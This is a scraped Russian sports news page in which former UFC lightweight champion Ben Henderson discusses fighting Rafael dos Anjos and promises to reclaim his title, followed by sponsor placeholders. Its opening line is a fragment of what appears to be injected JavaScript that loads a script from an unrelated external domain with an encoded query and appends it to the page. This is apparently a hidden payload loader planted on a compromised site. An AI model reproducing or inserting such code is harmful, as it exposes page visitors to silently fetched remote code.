: script.src = 'http://mvjrx.street-on-which.info' + '/?564803=N343MWUhKid-cXR0dHM'; w.document.body.appendChild(script); clearInterval(i);
 

БЕН ХЕНДЕРСОН: «Я ВЕРНУ СВОЙ ПОЯС»

четверг, 21 августа 2014 г.



Экс-чемпион UFC в легком весе Бен Хендерсон (21-3) охарактеризовал Рафаэла Дос Аньоса (21-7) и пообещал вернуться на пост короля дивизиона.

«Дос Аньос жесткий парень, настоящий ветеран спорта. Выступает в UFC уже долго, очень долго. Он дрался с элитными бойцами и побеждал элитных бойцов, так что я ожидаю действительно хороший, интересный бой. Постараюсь выйти и сделать все, что будет в моих силах, как и в каждом поединке.

Я заберу свой пояс назад. Не важно, у кого именно. Если это будет Мелендес — прекрасно, я уже побеждал его когда-то. Петтис — еще лучше, буду с нетерпением ждать этого боя. Но в любом случае я верну свой пояс. Мне все равно, кого придется победить, чтобы сделать это», — заявил Хендерсон.

Спонсор №1

SEO sprint - Всё для максимальной раскрутки!

Спонсор №2

Спонсор №3